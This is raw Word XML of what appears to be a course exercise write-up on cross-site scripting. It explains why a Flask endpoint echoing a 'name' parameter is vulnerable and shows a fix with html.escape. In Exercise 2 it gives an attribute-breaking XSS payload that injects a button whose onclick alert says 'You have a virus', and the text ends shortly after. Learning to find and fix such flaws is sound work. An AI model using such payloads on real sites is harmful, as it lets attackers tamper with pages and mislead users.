    <w:p w14:paraId="6ACC79AA" w14:textId="6F651CB4" w:rsidR="004B059E" w:rsidRDefault="00C3759F" w:rsidP="003E22B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The following code </w:t>
      </w:r>
      <w:r w:rsidR="008A272B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is heavily vulnerable to </w:t>
      </w:r>
      <w:r w:rsidR="00197F6E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS, due to </w:t>
      </w:r>
      <w:r w:rsidR="00D21393">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-exi</w:t>
      </w:r>
      <w:r w:rsidR="005B4164">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stent inp</w:t>
      </w:r>
      <w:r w:rsidR="00A46619">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ut sanitization. Anything inserted in the name parameter will allow full-scale HTML, CSS or JS usage</w:t>
      </w:r>
      <w:r w:rsidR="00CD1191">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004B059E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> For example, one’s name can be written in name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C9E17" w14:textId="6988545C" w:rsidR="004B059E" w:rsidRDefault="004B059E" w:rsidP="00DE50D9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B059E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7125C4E3" wp14:editId="319863C2">
            <wp:extent cx="4222288" cy="932688"/>
            <wp:effectExtent l="0" t="0" r="6985" b="127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763" cy="9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3978" w14:textId="766ADAFE" w:rsidR="00DE50D9" w:rsidRDefault="00DE50D9" w:rsidP="00DE50D9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example of exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF04A7" w14:textId="4346ACFD" w:rsidR="003E22B8" w:rsidRDefault="004E7D7A" w:rsidP="004E7D7A">
      <w:pPr>
        <w:jc w:val="center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7CB19A4" wp14:editId="634D62C2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1126490</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2336546</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1564560" cy="61560"/>
                <wp:effectExtent l="76200" t="57150" r="74295" b="110490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64560" cy="61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00A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0" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:85.85pt;margin-top:181.2pt;width:128.9pt;height:1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DwuiTAQAAOgMAAA4AAABkcnMvZTJvRG9jLnhtbJxSwU7CQBC9m/gP&#10;m71LKUiRhsJBYsJB5aAfsG536cbuTjO7pfj3TlsQ0BgTL83OvObNe/Nmvtzbku0UegMu4/FgyJly&#10;EnLjthl/fXm4uePMB+FyUYJTGf9Qni8X11fzpkrVCAooc4WMSJxPmyrjRQhVGkVeFsoKP4BKOQI1&#10;oBWBStxGOYqG2G0ZjYbDJGoA8wpBKu+pu+pBvuj4tVYyPGvtVWBlxseT2XTCWWhf4+mMM6RXEk9j&#10;zt7aXjJKeLSYi3SLoiqMPMgS/1BlhXEk4otqJYJgNZofVNZIBA86DCTYCLQ2UnWeyF08/OZu7d5b&#10;Z/GtrDGV4IJyYSMwHPfXAf8ZYUtaQfMIOSUk6gD8wEgL+juQXvQKZG1JT58KqlIEOglfmMrTolOT&#10;ZxzXeXzS73b3JwcbPPl62m2Qtf/HdExOWNK0dlUdGN2CE4y6FNJxCU+XLIREB+g3/r1G2yZDstk+&#10;4zTjo/12wat9YJKa8SS5nSQEScISqjr8yNwzHKuzHGj4ReLndSvs7OQXnwAAAP//AwBQSwMEFAAG&#10;AAgAAAAhAAQQvo+qAgAAlQYAABAAAABkcnMvaW5rL2luazEueG1stFRNb9swDL0P2H8g1EMvVqwv&#10;y3ZQt6cWGLABQ9sB29F11MSoPwJbadJ/P0p2HRdNDxs2JEgpinx8fKR6cXWoK3g2XV+2TUb4ghEw&#10;TdGuymadkR/3NzQh0Nu8WeVV25iMvJieXF1+/nRRNk91tcRfQISmd1ZdZWRj7XYZhvv9frGXi7Zb&#10;h4IxGX5pnr59JZdj1so8lk1psWT/6iraxpqDdWDLcpWRwh7YFI/Yd+2uK8x07TxdcYywXV6Ym7ar&#10;czshbvKmMRU0eY28fxKwL1s0SqyzNh2BusSGqVhwFavkOkVHfsjI7LxDij0yqUl4GvPXf8C8eY/p&#10;aEkR65jASGllnh2n0Gu+/Lj37127NZ0tzVHmQZTx4gWK4ez1GYTqTN9WOzcbAs95tUPJOGO4FmNt&#10;Hp4Q5D0eavNP8VCXD/Hm5N5KM7Y312EUbVqp19Hasja46PV22jHbI7Bz39nOPwfBBKMcv/E9S5eR&#10;Xgq20DKdjWLc4lfMh27Xbya8h+64r/5mUm3obF+u7GYSnS3EpPlc8VOZG1OuN/avUou2avExjJM+&#10;u465EGrWkS83rdqJh+u3D8bGb81jRs782wWfOTh851xJYKBiqYNzypNzec45VwHh+GEBwzsWUMEg&#10;xb8RFSB0ygPJKedUaj1E8DGOAfoDnAR4j7PB29T739uAsVP8EIMZDg39HGvzAMGOQQjm6Iwufz/Y&#10;ruSUKLCcVj4Mox0F/HVJHnLI/9ODE2Iig0yPwF6hQaehyLzg3B7IcwYahIoDB+Kbd616mycQ4UEo&#10;UCCiJNApxHiOFVUg4xgbSlLKNU25DATHbA5JJAKV4L0OOIskVRFgkAyolCkVMRVSIOuYpaBSqnDG&#10;kiksIuIkDajSSE8AJkY4Yo0colS8+fc1bRi+y8vfAAAA//8DAFBLAwQUAAYACAAAACEAtNJh1OEA&#10;AAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU6DQBCG7ya+w2ZMvNml0JaWsjTGiAcvja099DaF&#10;FVB2lrBLwbd3POnxn/nyzzfpbjKtuOreNZYUzGcBCE2FLRuqFLwf84c1COeRSmwtaQXf2sEuu71J&#10;MSntSG/6evCV4BJyCSqove8SKV1Ra4NuZjtNvPuwvUHPsa9k2ePI5aaVYRCspMGG+EKNnX6qdfF1&#10;GIyCzevzvsox7uhlGOPP/LQ8H91Zqfu76XELwuvJ/8Hwq8/qkLHTxQ5UOtFyjucxowqiVbgAwcQi&#10;3CxBXHiyjiKQWSr//5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7DwuiTAQAAOgMAAA4AAAAAAAAAAAAAAAAAPAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAAQQvo+qAgAAlQYAABAAAAAAAAAAAAAAAAAA+wMAAGRycy9pbmsvaW5rMS54bWxQ&#10;SwECLQAUAAYACAAAACEAtNJh1OEAAAALAQAADwAAAAAAAAAAAAAAAADTBgAAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAHkYvJ2/AAAAIQEAABkAAAAAAAAAAAAAAAAA4QcAAGRycy9fcmVs&#10;cy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB4AQAA1wgAAAAA&#10;">
                <v:imagedata r:id="rId12" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/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FF7CD2" wp14:editId="7556C48B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3970020</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>484124</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="423360" cy="321945"/>
                <wp:effectExtent l="76200" t="38100" r="72390" b="97155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3360" cy="3219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2F8B" id="Input penna 14" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:309.75pt;margin-top:35.25pt;width:39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+tC4JcBAAA6AwAADgAAAAAAAAAAAAAAAAA8AgAAZHJz&#10;L2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA5Ec96iwDAABzCAAAEAAAAAAAAAAAAAAAAAD/AwAA&#10;ZHJzL2luay9pbmsxLnhtbFBLAQItABQABgAIAAAAIQATTmKb3gAAAAoBAAAPAAAAAAAAAAAAAAAA&#10;AFkHAABkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAeRi8nb8AAAAhAQAAGQAAAAAAAAAA&#10;AAAAAABkCAAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHgBAABaCQAAAAA=&#10;">
                <v:imagedata r:id="rId14" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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8AFDD0" wp14:editId="395F2984">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2375789</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1540891</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="366649" cy="353441"/>
                <wp:effectExtent l="95250" t="76200" r="90805" b="10414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6649" cy="35344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B875" id="Input penna 9" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:184.2pt;margin-top:118.5pt;width:34.5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&#10;kY0S8uW6IKuELF/RKHIU+Yo+miRRCOB1xf9v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SwnoJUBAAA4AwAADgAAAAAAAAAAAAAAAAA8AgAAZHJzL2Uy&#10;b0RvYy54bWxQSwECLQAUAAYACAAAACEAjZAmOJoDAACRCAAAEAAAAAAAAAAAAAAAAAD9AwAAZHJz&#10;L2luay9pbmsxLnhtbFBLAQItABQABgAIAAAAIQB/uPVR4QAAAAsBAAAPAAAAAAAAAAAAAAAAAMUH&#10;AABkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAeRi8nb8AAAAhAQAAGQAAAAAAAAAAAAAA&#10;AADTCAAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHgBAADJCQAAAAA=&#10;">
                <v:imagedata r:id="rId16" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C3759F" w:rsidRPr="00C3759F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="106DDA5D" wp14:editId="1D74CE8D">
            <wp:extent cx="4285185" cy="2487168"/>
            <wp:effectExtent l="0" t="0" r="1270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3176" cy="24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F18A" w14:textId="15D08328" w:rsidR="00DE50D9" w:rsidRDefault="00DE50D9" w:rsidP="00DE50D9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The issues with the code, highlighted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B445B23" w14:textId="4970D798" w:rsidR="00DE50D9" w:rsidRDefault="00DE50D9" w:rsidP="00DE50D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Fixing the </w:t>
      </w:r>
      <w:r w:rsidR="00705B26">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code requires just simple HTML escaping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CDCB82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>from flask import Flask, request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270500F6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>from html import escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602A2D4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>app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D611B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</w:p>
    <w:p w14:paraId="1DF3043B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>@app.route("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF6007C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>def hello():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7D5F9B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 xml:space="preserve">    name = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00705B26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request.args.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00705B26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('name')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC96684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 xml:space="preserve">    name = escape(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6ED269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 xml:space="preserve">    content = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058AD4C0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 xml:space="preserve">    &lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A106B9E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 xml:space="preserve">        &lt;head&gt;&lt;title&gt;Hello Website&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD6A23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 xml:space="preserve">        &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDD7D1B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 xml:space="preserve">            Hello {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42155E15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 xml:space="preserve">        &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C72D69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 xml:space="preserve">    &lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C25F08F" w14:textId="77777777" w:rsidR="00705B26" w:rsidRP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 xml:space="preserve">    """.format(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789A3759" w14:textId="51498614" w:rsid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  <w:r w:rsidRPr="00705B26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    return content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA98144" w14:textId="5DD0B291" w:rsid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</w:p>
    <w:p w14:paraId="2A5F4C9A" w14:textId="77777777" w:rsidR="00705B26" w:rsidRDefault="00705B26" w:rsidP="00705B26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413F4624" w14:textId="1FF5D9F6" w:rsidR="00705B26" w:rsidRPr="00CF0327" w:rsidRDefault="00705B26" w:rsidP="00705B26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CF3C0A" w14:textId="198BE7C1" w:rsidR="00705B26" w:rsidRDefault="009326E0" w:rsidP="00705B26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspecting the code leads to finding the vulnerability quite quickly. We can craft a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-like attack in order to insert a button within the &lt;a&gt; tag that alerts the user, informing of the presence of a virus within their machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2746A112" w14:textId="5B9DEDBA" w:rsidR="009326E0" w:rsidRDefault="009326E0" w:rsidP="00705B26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0081F98A" w14:textId="519DCA8F" w:rsidR="009326E0" w:rsidRDefault="009326E0" w:rsidP="00705B26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The code to be sent to the API is the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A166CAC" w14:textId="77777777" w:rsidR="009326E0" w:rsidRDefault="009326E0" w:rsidP="00705B26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12360C71" w14:textId="3B306842" w:rsidR="009326E0" w:rsidRDefault="009326E0" w:rsidP="009326E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009326E0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"attribute="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009326E0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009326E0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;&lt;/a&gt;&lt;button onclick="alert('You have a virus')"&gt;Click me!&lt;/button&gt;&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009326E0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009326E0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C7123" w14:textId="77777777" w:rsidR="009326E0" w:rsidRDefault="009326E0" w:rsidP="009326E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583104E7" w14:textId="0818D45D" w:rsidR="009326E0" w:rsidRDefault="009326E0" w:rsidP="00705B26">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
